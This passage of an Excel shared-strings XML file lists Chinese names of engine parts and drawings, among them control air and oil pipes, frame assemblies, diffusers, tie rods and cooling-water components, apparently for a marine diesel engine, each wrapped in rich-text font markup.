    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刺破阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制块质量规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制面板部件清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制面板配线</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制模块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制驱动总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制设备布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制系统，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 50-108 ME/ME-C</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制系统，空气起动器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制箱定位</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油泵单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油泵壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油高压管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油高压管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油蓄压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制轴安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制组件，气缸切断</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>块规</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>快速接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>快速接头</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>框架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>框架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>框架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴侧后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>框架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴侧前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>框架总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>框架总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>框架总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩散器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩散器板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩散器标记</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩散器防护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩散器环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩散器叶片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩压管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩压管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩压管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩压管布置</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩压空气温度电磁阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩压连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩压旁通布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩压箱盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆导套，上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆导套，下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆端头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆连接布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉力测试设备</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉力测试设备说明</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉伸弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉伸夹具说明，吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉伸试验装置卡具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉线夹</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却插管吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却底座焊接说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却环，缸套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器插芯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器插芯缸体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器和增压器面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器进口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器内置清洁装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器箝位工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水泵供货图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水出口管系集</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水处理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水管支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
